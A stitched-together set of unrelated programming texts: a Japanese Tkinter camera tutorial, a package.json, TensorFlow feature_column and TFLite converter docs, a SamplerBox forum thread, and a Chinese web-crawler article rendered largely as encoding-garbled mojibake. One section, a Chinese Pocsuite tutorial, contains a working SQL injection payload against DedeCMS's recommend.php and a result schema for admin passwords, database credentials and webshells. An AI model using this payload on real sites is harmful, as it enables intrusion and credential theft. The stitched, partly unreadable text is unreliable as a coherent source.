# 15ミリ秒ごとに更新する
def update(self):
_, frame = self.vcap.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(frame))
self.canvas.create_image(0, 0, image = self.photo, anchor = tkinter.NW)
self.window.after(self.delay, self.update)
# Closeボタンの処理
def destructor(self):
self.window.destroy()
self.vcap.release()
App(tkinter.Tk(), "Tkinter & Camera module")
ポイントはupdate関数を15ミリ秒ごとに呼び出してキャンバスの画像を更新することです。
after関数を使うことで一定時間後に関数を実行させることができます。
しかし、これだけでは画面に映像が出てきません!
なぜなら上のコードはウェブカメラ用のコードだからです。
ウェブカメラの場合は上記コードでうまく動きますが、カメラモジュールの場合失敗します。
僕自身かなりの時間調べてやっと解決策を見つけました。
カメラモジュールの映像が表示されない解決策
sudo modprobe bcm2835-v4l2このコマンドを実行することでカメラモジュールの映像が表示されるようになります。
参考にしたサイト
Python OpenCV - show a video in a Tkinter window
PiCamera streaming on Tkinter label -Help
|
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109
{
"name": "sin3d",
"description": "Synthesis Image Noise Detection on Distributed Data : A web app to collect data on noise detection by humans on images.",
"version": "0.3.3",
"private": true,
"keywords": [
"noise",
"detection",
"synthesis image",
"distributed",
"data",
"web",
"experiment"
],
"directories": {
"doc": "./DOCUMENTATION"
},
"homepage": "https://github.com/prise-3d/SIN3D",
"author": "Antoine Sauvage <contact@asauvage.fr> (https://asauvage.fr/)",
"contributors": [
"Jérôme Buisine <contact@jeromebuisine.fr> (https://jeromebuisine.fr/)",
"Samuel Delepoulle <delepoulle@lisic.univ-littoral.fr>"
],
"repository": {
"type": "git",
"url": "git+https://github.com/prise-3d/SIN3D.git"
},
"bugs": {
"url": "https://github.com/prise-3d/SIN3D/issues"
},
"license": "MIT",
"scripts": {
"server:start": "node -r esm index.js",
"server:start:no-delete-extracts": "node -r esm index.js --no-delete",
"server:lint": "eslint server/ --fix",
"app:dev": "vue-cli-service serve",
"app:build": "vue-cli-service build",
"app:lint": "vue-cli-service lint",
"doc": "apidoc -i server/routes -o doc",
"test": "node test/utils/_test_setup_start.js && ava --verbose && node test/utils/_test_setup_stop.js"
},
"dependencies": {
"@hapi/boom": "^7.4.2",
"body-parser": "^1.19.0",
"compression": "^1.7.4",
"cors": "^2.8.5",
"cron": "^1.7.1",
"esm": "^3.2.25",
"express": "^4.17.1",
"helmet": "^3.18.0",
"mongoose": "^5.6.4",
"morgan": "^1.9.1",
"serve-static": "^1.14.1",
"sharp": "^0.24.0",
"ua-parser-js": "^0.7.20",
"winston": "^3.2.1"
},
"devDependencies": {
"@vue/cli-plugin-babel": "^3.9.2",
"@vue/cli-plugin-eslint": "^3.9.2",
"@vue/cli-service": "^3.9.2",
"@vue/eslint-config-standard": "^4.0.0",
"apidoc": "^0.17.7",
"ava": "^2.2.0",
"babel-eslint": "^10.0.2",
"deepmerge": "^4.0.0",
"eslint": "^6.0.1",
"eslint-plugin-vue": "^5.2.3",
"fs-extra": "^8.1.0",
"material-design-icons-iconfont": "^5.0.1",
"stylus": "^0.54.5",
"stylus-loader": "^3.0.2",
"supertest": "^4.0.2",
"vue": "^2.6.10",
"vue-cli-plugin-vuetify": "^0.5.0",
"vue-router": "^3.0.7",
"vue-template-compiler": "^2.6.10",
"vuetify": "^1.5.16",
"vuetify-loader": "^1.2.2",
"vuex": "^3.1.1",
"vuex-persist": "^2.0.1",
"yargs": "^13.2.4"
},
"postcss": {
"plugins": {
"autoprefixer": {}
}
},
"engines": {
"node": ">= 10.0.0"
},
"browserslist": [
"> 1%",
"last 2 versions",
"not ie <= 8"
],
"apidoc": {
"url": "https://diran.univ-littoral.fr/api",
"sampleUrl": "https://diran.univ-littoral.fr/api",
"template": {
"forceLanguage": "en"
}
},
"ava": {
"require": [
"esm"
]
}
}
|
特征工程方法
feature_column
简介
作为一个合格的TFboy, 不仅需要熟练使用低级API。
还需要会用estimator这类高级API
高级API具有封装良好、自动保存checkpoint、自动保存模型、自动设置Adagrad优化的有点。
还可以直接使用feature_column进行输入数据特征处理。
离散数据
离散数据处理方式有:
one_hot
categorical_column_with_hash_bucket 装桶
crossed_column 交叉装桶
one_hot
color_data = {'color': [ "R", "B", 'G', 'A', 'A']} # 4行样本
builder = _LazyBuilder(color_data)
color_column = feature_column.categorical_column_with_vocabulary_list(
'color', ['R', 'G', 'B'], dtype=tf.string, default_value=-1
)
color_column_tensor = color_column._get_sparse_tensors(builder)
# 将稀疏的转换成dense,也就是one-hot形式,只是multi-hot
color_column_identy = feature_column.indicator_column(color_column)
color_dense_tensor = feature_column.input_layer(color_data, [color_column_identy])
with tf.Session() as session:
session.run(tf.global_variables_initializer())
session.run(tf.tables_initializer())
print(session.run([color_column_tensor.id_tensor]))
print('use input_layer' + '_' * 40)
print(session.run([color_dense_tensor]))
输出
[SparseTensorValue(indices=array([[0, 0],
[1, 0],
[2, 0],
[3, 0],
[4, 0]]), values=array([ 0, 2, 1, -1, -1]), dense_shape=array([5, 1]))]
use input_layer________________________________________
[array([[1., 0., 0.],
[0., 0., 1.],
[0., 1., 0.],
[0., 0., 0.],
[0., 0., 0.]], dtype=float32)]
categorical_column_with_identity
有些数据比如ID,看起来是数字,其实是离散数据的。
color_data = {'color': [1, 2, 3, 5,1]}
builder = _LazyBuilder(color_data)
color_column = feature_column.categorical_column_with_identity(
key='color', num_buckets=4, default_value=0)
color_column_tensor = color_column._get_sparse_tensors(builder)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.tables_initializer())
print(sess.run(color_column_tensor.id_tensor))
输出,num_buckets指的是种类,default_value是默认值,如果超出了范围。
SparseTensorValue(indices=array([[0, 0],
[1, 0],
[2, 0],
[3, 0],
[4, 0]]), values=array([1, 2, 3, 0, 1]), dense_shape=array([5, 1]))
categorical_column_with_hash_bucket
如果种类数目特别多,但是大多数都不怎么用,甚至大多数都不用的情况,建桶会比较方便。
dpt = tf.feature_column.categorical_column_with_hash_bucket(
'dpt', hash_bucket_size=400)
映射规则可以通过 string_to_hash_bucket_fast 查看
sess.run(tf.string_to_hash_bucket_fast(dpt,400))
crossed_column
tf.feature_column.crossed_column(["dpt","arr"],hash_bucket_size = 100000)
映射规则可以通过input_layer查看
def get_hash(num1, num2):
arr_temp = {arr: tf.Variable(cross_arr[num1:num2], tf.string)}
dpt_temp = {dpt: tf.Variable(cross_dpt[num1:num2], tf.string)}
arr_x_dpt = dict(arr_temp, **dpt_temp)
# crossed column
crossed_sn_raw = tf.feature_column.crossed_column([arr, dpt],hash_bucket_size=self.crossed_column_bucket_size[i])
crossed_sn = tf.feature_column.indicator_column(crossed_sn_raw)
layer_sn = tf.feature_column.input_layer(arr_x_dpt, crossed_sn)
with tf.Session() as session:
init = tf.global_variables_initializer()
session.run(init)
res = session.run(layer_sn).argmax(axis=1)
return res
连续数据
连续数据有:
直接用
tf.feature_column.numeric_column("age")
CDF分桶用
age = tf.feature_column.bucketized_column \
(age ,boundaries = [1.0,10.0,50.0,75.0])
一般来说,边界通过:
thresholds = []
percentiles = np.linspace(100/slice_num, 100-100/slice_num, slice_num-1)
thresholds_raw = np.percentile(np.array(f_values), percentiles, interpolation='lower')
确定
参考
本文由 mmmwhy 创作,最后编辑时间为: May 2, 2019 at 01:33 pm
|
0x00 关于Pocsuite
Pocsuite 是知道创宇安全研究团队打造的一款基于漏洞与 POC 的远程漏洞验证框架。可以让我们不用考虑过多的细节,只要考虑验证代码就可以,它封装了一些我们常用的东西,比如requests,在我们平常使用requests是要考虑cookie、要考虑header,但是在框架下则不需要有这些考虑,因为这些东西框架都帮你解决了。
0x01 简单介绍
安装
使用pip install pocsuite即可安装
常用参数
-u 指定一个目标url
-f 指定一个存放目标url的文件
-r 指定一个存放poc的文件夹
–report 导出结果到html文件
–cookie 携带cookie
–referer 修改referer
–user-agent 修改UA
模式
执行一个poc有两种模式
--verify 漏洞验证模式(只是验证,不能更改服务器的东西)
--attack 漏洞利用模式
示例
pocsuite -u "http://www.xxxx.com" -r poc_path/poc_name.py --atack
执行一个poc有两种模式
poc编写
可以新建一个文件夹,命名为mypoc,里面就放你自己写的poc(当然也可以在mypoc里新建文件夹放一类poc,对poc进行分类)
此时示例(对目标进行常见服务的测试,加载一类多个poc脚本)
pocsuite -u "http://www.xxxx.com" -r poc_path/server/ --verify
poc的命名规范
漏洞ID_版本号_漏洞类型(其中不能有大写字母,所有符号要改为"_"),大致如下:
_xxxx_struct2_2016_s2_016_code_execution.py
_xxxx_dedecms_20130715_sql_inj.py
漏洞ID_版本号_漏洞类型(其中不能有大写字母,所有符号要改为
poc的编写流程
导入pocsuite API模块
创建TestPOC类
填写POC信息
编写_berify()方法
编写_attack()方法
注册类
0x02 实例
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 导入pocsuite的必要模块
from pocsuite.net import req # requests模块,和requests用法完全一样
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
"""docstring for TestPOC"""
vulID = '' # VUL ID
version = '' # 版本号,默认为1
author = '' # POC 作者的大名
vulDate = '' # 漏洞公开的时间,不知道就写今天
createDate = '' # 编写 POC 的日期
updateDate = '' # POC更新的时间,默认和编写时间一样
references = [''] # 漏洞地址来源,0day 不用写
name = '' # POC 名称
appPowerLink = '' # 漏洞厂商主页地址
appName = '' # 漏洞应用名称
appVersion = '' # 漏洞影响版本
vulType = '' # 漏洞类型,类型参考见 漏洞类型规范表
desc = ''' ''' # 漏洞简要描述
samples = [] # 测试样例,就是用 POC 测试成功的网站url,选填
install_requires = [] # POC 第三方模块依赖,请尽量不要使用第三方模块
def _verify(self, verify=True): # 漏洞测试代码
result = {}
target_url = self.url
# 这里写入漏洞测试代码
path = "/plus/recommend.php"
payload = "?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select md5(512341)),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
html = req.get(target_url + path + payload, timeout=10).content
if '5e8523b1645e6225001b9027cddc1c85' in html:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + path
result['VerifyInfo']['Path'] = path
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _attack(self): # 漏洞利用代码
# result = {}
# # 先进行检测是否存在漏洞
# if not self._verify(verify=False):
# return self.parse_attack(result)
# target_url = self.url
# # 这里写漏洞利用代码
# return self.parse_attack(result)
return self._verify() # 如果没漏洞利用代码,可以直接return测试函数
def parse_attack(self, result): # poc输出函数,可以输出错误和成功信息
output = Output(self)
if result:
output.success(result)
else:
output.fail('Nothing returned')
return output
register(TestPOC) #注册类
0x03 关于poc中result字典的内容
# result是一个字典,里面存储所有的漏洞信息:
result:{
'DBInfo': {
'Username': '管理员用户名',
'Password':'管理员密码',
'Salt': '加密盐值',
'Uid': '用户ID',
'Groupid': '用户组ID'
}
'ShellInfo': {
'URL': 'Webshell地址',
'Content': 'Webshell内容'
}
'FileInfo': {
'Filename': '文件名称',
'Content': '文件内容'
}
'XSSInfo': {
'URL': '验证URL',
'Payload': '验证Payload'
}
'AdminInfo': {
'Uid': '管理员ID',
'Username': '管理员用户名',
'Password': '管理员密码'
}
'Database': {
'Hostname': '数据库主机名',
'Username': '数据库用户名' ,
'Password': '数据库密码',
'DBname': '数据库名'
}
'VerifyInfo': {
'URL': '验证URL',
'Postdata': '验证POST数据',
'Path': '网站绝对路径'
}
'SiteAttr': {
'Process': '服务器进程'
}
}
|
AlexM posted Sep 27 '16, 12:39:
Hey guys,
Wondering if anyone can help me with this idea.
So sometimes in a live set I'll have a song that has a 2 or more voices, eg verses=synth, choruses=mellotron, etc. Currently I use buttons on my MIDI controller to switch between instruments in combinator devices in Reason (for those familiar with the program). As you know with SamplerBox it can take a few seconds when switching between presets, which is fine in between songs but definitely not during.
How would I go about using a new keyword variable (let's say %voice) to the definition.txt to achieve this? In python I would imagine somehow disabling and enabling sample sets depending on which voice button is toggled, but I'm having trouble figuring out where to start...
HansEhv posted Sep 27 '16, 14:06:
You can also use another approach as midi offers 128 notes, which is 10 octaves. If you give the samples alternative midi note numbers, it is possible to have 2 to 4 voices in 1 sample. By using the octave buttons on the keyboard you can map it quite fast on the right range=voice.
AlexM posted Sep 27 '16, 16:19:
Ah ok good idea. What if the voice's midinote values are shifted instead?
-When voice is enabled, range is the usual 1-128
-Then disable all other voices by pushing their midinote ranges way out of the way 1000-1128
I know that simply assigning all required samples notes across 1-128 is easier to achieve programmatically, but I'm also thinking about easing the headaches caused when making sample sets ;)
HansEhv posted Sep 27 '16, 23:51:
That's the royal way indeed, but it will take some programming :-)
It will also set SB's requirements to PI3 because of the memory usage.
AlexM posted Sep 28 '16, 08:35:
That's in the case that the combined size of the samples might be massive, yeah? In my case, sample sets (or a voice) are rarely larger than 100mb so I wouldn't be worrying about that anyway - but it's definitely something worth bearing in mind
AlexM posted Sep 28 '16, 17:59:
This ended up being as easy as I initially thought - although it still took me half a day to find this solution haha!
Added a new %voice variable to definition.txt. For example,
piano_note%midinote_voicenumber%voice.wav
organ_note%midinote_voicenumber%voice.wav
I've condensed the code to mostly just my additions/modifications. The main thing was adding voice to the samples dictionary (dictionary, right?), and modifying the current_voice variable with MIDI buttons
# ACTUALLY LOAD
...
defaultparams = {'midinote': '0', 'velocity': '127', 'notename': '', 'voice': '1'}
...
.replace(r"\%voice", r"(?P<voice>\d+)")\
...
voice = int(info.get('voice', defaultparams['voice']))
voices.append(voice)
samples[midinote, velocity, voice] = Sound(os.path.join(dirname, fname), midinote, velocity)
...
initial_keys = set(samples.keys())
voices = list(set(voices)) # Remove duplicates by converting to a set
for voice in xrange(len(voices)):
for midinote in xrange(128):
lastvelocity = None
for velocity in xrange(128):
if (midinote, velocity, voice) not in initial_keys:
...
Some MIDI buttons will change the current_voice variable which determines which samples are active
# MIDI CALLBACK
...
try:
playingnotes.setdefault(midinote, []).append(samples[midinote, SelectVelocity, current_voice].play(midinote, velocity))
except:
pass
...
Sustain pedal also works as intended: samples will keep sustaining even after a voice change.
I also discovered that this opens the door to layering samples which for me could be super useful, but I can also think of a handful of potential issues off the top of my head
HansEhv posted Sep 28 '16, 18:41:
That's clever! Really neat solution,thanks for sharing.
HansEhv posted Oct 2 '16, 17:43:
Some minor things I had to do to get it working:
"for voice in xrange(len(voices)):" changed to "for voice in voices:"
all occurrences of samples[] will have to get the extra parameter (obvious of course, but pretty hard to debug if you forget one :-))
current voice is a global variable
|
Convert a TensorFlow model into output_format.
tf.lite.TFLiteConverter(
graph_def, input_tensors, output_tensors, input_arrays_with_shape=None,
output_arrays=None, experimental_debug_info_func=None
)
This is used to convert from a TensorFlow GraphDef, SavedModel or tf.kerasmodel into either a TFLite FlatBuffer or graph visualization.
Example usage:
# Converting a GraphDef from session.
converter = lite.TFLiteConverter.from_session(sess, in_tensors, out_tensors)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
# Converting a GraphDef from file.
converter = lite.TFLiteConverter.from_frozen_graph(
graph_def_file, input_arrays, output_arrays)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
# Converting a SavedModel.
converter = lite.TFLiteConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
# Converting a tf.keras model.
converter = lite.TFLiteConverter.from_keras_model_file(keras_model)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
Args
graph_def Frozen TensorFlow GraphDef.
input_tensors List of input tensors. Type and shape are computed usingfoo.shape and foo.dtype.
output_tensors List of output tensors (only .name is used from this).
input_arrays_with_shape Tuple of strings representing input tensor namesand list of integers representing input shapes(e.g., [("foo" : [1, 16, 16, 3])]). Use only when graph cannot be loadedinto TensorFlow and when input_tensors and output_tensors areNone. (default None)
output_arrays List of output tensors to freeze graph with. Use only whengraph cannot be loaded into TensorFlow and when input_tensors andoutput_tensors are None. (default None)
experimental_debug_info_func An experimental function to retrieve thegraph debug info for a set of nodes from the graph_def.
Raises
ValueError Invalid arguments.
Attributes
inference_type Target data type of real-number arrays in the output file.Must be {tf.float32, tf.uint8}. If optimzations are provided, thisparameter is ignored. (default tf.float32)
inference_input_type Target data type of real-number input arrays. Allowsfor a different type for input arrays.If an integer type is provided and optimizations are not used,quantized_inputs_stats must be provided.If inference_type is tf.uint8, signaling conversion to a fully quantizedmodel from a quantization-aware trained input model, theninference_input_type defaults to tf.uint8.In all other cases, inference_input_type defaults to tf.float32.Must be {tf.float32, tf.uint8, tf.int8}
inference_output_type Target data type of real-number output arrays. Allowsfor a different type for output arrays.If inference_type is tf.uint8, signaling conversion to a fully quantizedmodel from a quantization-aware trained output model, theninference_output_type defaults to tf.uint8.In all other cases, inference_output_type must be tf.float32, an errorwill be thrown otherwise.Must be {tf.float32, tf.uint8, tf.int8}
output_format Output file format. Currently must be {TFLITE,GRAPHVIZ_DOT}. (default TFLITE)
quantized_input_stats Dict of strings representing input tensor namesmapped to tuple of floats representing the mean and standard deviationof the training data (e.g., {"foo" : (0., 1.)}). Only need ifinference_input_type is QUANTIZED_UINT8.real_input_value = (quantized_input_value - mean_value) / std_dev_value.(default {})
default_ranges_stats Tuple of integers representing (min, max) range valuesfor all arrays without a specified range. Intended for experimenting withquantization via "dummy quantization". (default None)
drop_control_dependency Boolean indicating whether to drop controldependencies silently. This is due to TFLite not supporting controldependencies. (default True)
reorder_across_fake_quant Boolean indicating whether to reorder FakeQuantnodes in unexpected locations. Used when the location of the FakeQuantnodes is preventing graph transformations necessary to convert the graph.Results in a graph that differs from the quantized training graph,potentially causing differing arithmetic behavior. (default False)
change_concat_input_ranges Boolean to change behavior of min/max ranges forinputs and outputs of the concat operator for quantized models. Changesthe ranges of concat operator overlap when true. (default False)
allow_custom_ops Boolean indicating whether to allow custom operations.When false any unknown operation is an error. When true, custom ops arecreated for any op that is unknown. The developer will need to providethese to the TensorFlow Lite runtime with a custom resolver.(default False)
post_training_quantize Deprecated. Please specify [Optimize.DEFAULT] foroptimizations instead. Boolean indicating whether to quantize theweights of the converted float model. Model size will be reduced andthere will be latency improvements (at the cost of accuracy).(default False)
dump_graphviz_dir Full filepath of folder to dump the graphs at variousstages of processing GraphViz .dot files. Preferred over--output_format=GRAPHVIZ_DOT in order to keep the requirements of theoutput file. (default None)
dump_graphviz_video Boolean indicating whether to dump the graph afterevery graph transformation. (default False)
target_ops Deprecated. Please specify target_spec.supported_ops instead.Set of OpsSet options indicating which converter to use.(default set([OpsSet.TFLITE_BUILTINS]))
target_spec Experimental flag, subject to change. Specification of targetdevice.
optimizations Experimental flag, subject to change. A list of optimizationsto apply when converting the model. E.g. [Optimize.DEFAULT]
representative_dataset A representative dataset that can be used togenerate input and output samples for the model. The converter can usethe dataset to evaluate different optimizations.
experimental_enable_mlir_converter Experimental flag, subject to change.Enables the MLIR converter instead of the TOCO converter.
Methods
convert
View source
convert()
Converts a TensorFlow GraphDef based on instance variables.
Returns
The converted data in serialized format. Either a TFLite Flatbuffer or aGraphviz graph depending on value in output_format.
Raises
ValueError Input shape is not specified.None value for dimension in input_tensor.
from_frozen_graph
View source
@classmethod
from_frozen_graph(
graph_def_file, input_arrays, output_arrays, input_shapes=None
)
Creates a TFLiteConverter class from a file containing a frozen GraphDef.
Args
graph_def_file Full filepath of file containing frozen GraphDef.
input_arrays List of input tensors to freeze graph with.
output_arrays List of output tensors to freeze graph with.
input_shapes Dict of strings representing input tensor names to list ofintegers representing input shapes (e.g., {"foo" : [1, 16, 16, 3]}).Automatically determined when input shapes is None (e.g., {"foo" :None}). (default None)
Returns
TFLiteConverter class.
Raises
IOError File not found.Unable to parse input file.
ValueError The graph is not frozen.input_arrays or output_arrays contains an invalid tensor name.input_shapes is not correctly defined when required
from_keras_model_file
View source
@classmethod
from_keras_model_file(
model_file, input_arrays=None, input_shapes=None, output_arrays=None,
custom_objects=None
)
Creates a TFLiteConverter class from a tf.keras model file.
Args
model_file Full filepath of HDF5 file containing the tf.keras model.
input_arrays List of input tensors to freeze graph with. Uses inputarrays from SignatureDef when none are provided. (default None)
input_shapes Dict of strings representing input tensor names to list ofintegers representing input shapes (e.g., {"foo" : [1, 16, 16, 3]}).Automatically determined when input shapes is None (e.g., {"foo" :None}). (default None)
output_arrays List of output tensors to freeze graph with. Uses outputarrays from SignatureDef when none are provided. (default None)
custom_objects Dict mapping names (strings) to custom classes orfunctions to be considered during model deserialization. (default None)
Returns
TFLiteConverter class.
from_saved_model
View source
@classmethod
from_saved_model(
saved_model_dir, input_arrays=None, input_shapes=None, output_arrays=None,
tag_set=None, signature_key=None
)
Creates a TFLiteConverter class from a SavedModel.
Args
saved_model_dir SavedModel directory to convert.
input_arrays List of input tensors to freeze graph with. Uses inputarrays from SignatureDef when none are provided. (default None)
input_shapes Dict of strings representing input tensor names to list ofintegers representing input shapes (e.g., {"foo" : [1, 16, 16, 3]}).Automatically determined when input shapes is None (e.g., {"foo" :None}). (default None)
output_arrays List of output tensors to freeze graph with. Uses outputarrays from SignatureDef when none are provided. (default None)
tag_set Set of tags identifying the MetaGraphDef within the SavedModel toanalyze. All tags in the tag set must be present. (default set("serve"))
signature_key Key identifying SignatureDef containing inputs and outputs.(default DEFAULT_SERVING_SIGNATURE_DEF_KEY)
Returns
TFLiteConverter class.
from_session
View source
@classmethod
from_session(
sess, input_tensors, output_tensors
)
Creates a TFLiteConverter class from a TensorFlow Session.
Args
sess TensorFlow Session.
input_tensors List of input tensors. Type and shape are computed usingfoo.shape and foo.dtype.
output_tensors List of output tensors (only .name is used from this).
Returns
TFLiteConverter class.
get_input_arrays
View source
get_input_arrays()
Returns a list of the names of the input tensors.
|
é¨åææ #
é¨åç½ç«çç¬åææãå ¶ä¸å¾1æ¯æ¬å客çç¬åææï¼è¡¨æè¯¥æ¹æ¡æ¯éç¨ä¸è¬ç½ç«çï¼å¾2åå¾3æ¯ä¸¤ä¸ªå¼æºç论åç¨åºæå»ºèµ·æ¥ç论åçç¬åææï¼è¡¨æå¯¹äºå¼æºç¨åºè½å¤æ£å¸¸ç¬åï¼å¾4æ¯å¯¹èåç天涯论åçç¬åææï¼è¡¨æåªææ¯å ¬å¸å é¨å¼åç论åï¼ä¹å ·æä¸éçææã
æ¹è¿ç©ºé´ #
æ»çæ¥è¯´ï¼è¿æ¯ä¸ç§è¾é«æççãæ çç£çéç¨ç½ç«ç¬åæ¹æ¡ï¼è½å¤èªéåºä¸åçç½ç«ï¼ä¸å±éäºè®ºåï¼ï¼éåä¼ä¸å¤§è§æ¨¡é¨ç½²ã
å½ç¶ï¼è¿ç§æ¹æ¡ä¹æä¸äºæå¾ æ¹è¿çå°æ¹ï¼
1ãä¿è¯æçåç¨³å®æ§ï¼çºç²äºæ®éï¼æ¯å¦å¯¹å 容åèæ¶ï¼ç´æ¥æç §ä¸æå æ¯æ¥å¤æï¼æ²¡æç¨å°æ´ç²¾ç¡®çè¯è¨æ¨¡åæ¹æ¡ï¼
2ãè¿ä¸æ¥çæå空é´è¾å°ï¼å 为åºäºæ 忍¡æ¿æ¯è¾çæ¹æ¡ï¼ç´æ¥æ··åå¼å°æåºäºææææ¬ï¼ä¸¢å¤±äºä½ç½®å屿¬¡ä¿¡æ¯ï¼è½ç¶éè¿èç±»å¯ä»¥è¿ä¸æ¥è§£å³è¿ä¸ªæ åµï¼ä½è¿æ¯åå¨å¤±æçç½ç«ï¼å¨åæ¥æ¹æ³åºç¡ä¸çæå空é´ä¸å¤§ï¼
3ãæ²¡æå©ç¨å°è§è§ä¿¡æ¯ï¼æ¯å¦æ²¡æ³åç¡®å®ä½ç¨æ·åï¼æ¯å 为æä»¬ä¸ç¥éé£éæç®æ¯ç¨æ·åï¼ä½æ¯å¦æèç¼å»ççè¯ï¼é£æ¯æ¯è¾å®¹æå¤æçï¼ä¹å°±æ¯è¯´ï¼è§è§ä¿¡æ¯æ¯ä¸ä¸ªæ¯è¾éè¦çææ ï¼å¦æç²¾ååº¦è¦æ±æ´é«çè¯ï¼æä»¬éè¦å©ç¨è§è§ä¿¡æ¯ã
æå¾ çå°æ´å¥½çè§£å³æ¹æ¡ã
代ç #
Python2.7代ç ï½
éç¨ç¬åæ¡æ¶ï¼
#! -*- coding:utf-8 -*-
import requests as rq
import numpy as np
import re
from lxml.html import html5parser
class crawler:
def __init__(self, standard_urls):
self.title = ''
self.emphase_mark = set(['p', 'br', 'em', 'strong', 'b', 'font', 'u', 'a', 'img', 'h1', 'h2', 'h3', 'h4', 'h5', 'sup', 'sub', 'blockquote', 'cite', 'code', 'pre'])
self.standard_urls = standard_urls
self.sess = rq.Session()
self.standard_contents = []
self.find_title = re.compile('<title>([\s\S]*?)</title>').findall
if isinstance(standard_urls, list):
self.standard_dom = self.create_dom(self.standard_urls[0])
self.standard_contents = set([c[1:] for c in self.traverse_dom(self.standard_dom)[1]])
for url in self.standard_urls[1:]:
self.standard_dom = self.create_dom(url)
self.standard_contents = self.standard_contents & set([c[1:] for c in self.traverse_dom(self.standard_dom)[1]])
else:
self.standard_dom = self.create_dom(self.standard_urls)
self.standard_contents = set([c[1:] for c in self.traverse_dom(self.standard_dom)[1]])
self.find_zh = re.compile(u'[\u4e00-\u9fa5]').findall
self.find_zh_en = re.compile(u'[a-zA-Z\d_\u4e00-\u9fa5]').findall
self.find_date = re.compile(u'.*?å¹´.*?月.*?æ—¥|å‘布时间|\d{4}\-\d{1,2}\-\d{1,2}|昨天|å‰å¤©|今天|å°æ—¶å‰|\d{1,2}:\d{2}').findall
def create_dom(self, url):
r = self.sess.get(url)
return html5parser.fromstring(r.content)
def traverse_dom(self, dom, idx=0, tag=''):
content = []
if len(dom) > 0:
tag += (str(dom.tag)+'_')
if dom.tag not in self.emphase_mark:
idx += 1
idx_ = idx
if dom.text and dom.text.strip():
content.append((idx_, tag, dom.text.strip()))
for d in dom:
idx, content_ = self.traverse_dom(d, idx, tag)
content.extend(content_)
if dom.tail and dom.tail.strip():
content.append((idx_, tag, dom.tail.strip()))
elif dom.tag != 'head':
if dom.text and dom.text.strip():
content.append((idx, tag, dom.text.strip()))
if dom.tail and dom.tail.strip():
content.append((idx, tag, dom.tail.strip()))
if (isinstance(dom.tag, str) or isinstance(dom.tag, unicode)) and 'title' in dom.tag and not self.title:
self.title = dom.text.strip() + dom.tail.strip()
return idx, content
def peak(self, d):
r = []
if d[0] > d[1]:
r.append(0)
for i in range(1, len(d)-1):
if d[i] > max(d[i-1], d[i+1]):
r.append(i)
if len(d) >= 3 and d[-1] > d[-2]:
r.append(len(d)-1)
return r
def keep_proba(self, s):
if len(self.find_zh_en(s)) == len(s):
return 1
else:
c0 = len(''.join(self.find_date(s)))
return 1.*(len(self.find_zh(s))+c0)/(len(s))
def crawl_url(self, url, cluster_times=2):
self.title = ''
dom = self.create_dom(url)
content = self.traverse_dom(dom)[1]
content_ = []
for c in content:
if c[1:] not in self.standard_contents:
content_.append(list(c))
content = [content_[0]]
for c in content_:
if c[0] == content[-1][0]:
content[-1] = [c[0], c[1], content[-1][2]+'\n'+c[2]]
else:
content.append(c)
content = [c for c in content if self.keep_proba(c[2]) >= 0.25]
for _ in range(cluster_times):
content_ = content[:]
if len(content_) >= 3:
idxs = [c[0] for c in content_]
idxs = set([idxs[i+1] for i in self.peak(np.diff(idxs))])
content = [content_[0]]
cc = 1
for i in range(1, len(content_)):
if content_[i][0] in idxs:
content[-1][0] = int(content[-1][0]/cc)
content.append(content_[i])
cc = 1
else:
content[-1] = [content[-1][0]+content_[i][0], content[-1][1], content[-1][2]+'\n'+content_[i][2]]
cc += 1
return [c[2] for c in content]
è½å®å°è®ºåï¼
def find_datetime(s):
r = []
for t in s.split('\n'):
l = len(t)*1.
d = re.findall('\d+\-\d+\-\d+ +\d+:\d+', t)
if d and len(d[0])/l > 0.5:
r.append(d[0])
else:
d = re.findall(u'\d+年 *\d+月 *\d+日 +\d+:\d+', t)
if d and len(d[0])/l > 0.5:
d = re.findall(u'(\d+)年 *(\d+)月 *(\d+)日 +(\d+):(\d+)', t)
r.append('%s-%s-%s %s:%s'%d[0])
else:
r.append(None)
return r
def extract_info(b,c):
r = []
for t in b:
dts = find_datetime(t)
t = t.split('\n')
dt = max(dts)
if dt:
idx = dts.index(dt)
r.append((dt, '\n'.join(t[:idx]), '\n'.join(t[idx+1:])))
else:
r.append((None, '\n'.join(t), '\n'.join(t)))
idx = 1 + (sum([c.keep_proba(i[1]) for i in r]) < sum([c.keep_proba(i[2]) for i in r]))
r = [(i[0], i[idx]) for i in r if i[idx]]
if not r[0][0]:
r = r[1:]
rr = [r[0]]
for a,b in r[1:]:
if not a:
rr[-1] = rr[-1][0], rr[-1][1]+'\n'+b
else:
rr.append((a,b))
return rr
if __name__ == '__main__':
c = crawler(['http://bbs.emath.ac.cn/thread-9531-1-1.html', 'http://bbs.emath.ac.cn/thread-2749-1-1.html'])
b = c.crawl_url('http://bbs.emath.ac.cn/thread-9538-1-1.html')
title = c.title
r = extract_info(b,c)
keys = ('publish_date', 'content', 'title', 'author')
final = {}
final['post'] = dict(zip(keys, (r[0][0], r[0][1], title, '')))
final['replys'] = [dict(zip(keys, (i[0], i[1], title, ''))) for i in r[1:]]
import pandas as pd
pd.DataFrame(r)
转载å°è¯·å
æ¬æ¬æå°åï¼https://spaces.ac.cn/archives/4430
æ´è¯¦ç»ç转载äºå®è¯·åèï¼ãç§å¦ç©ºé´FAQã
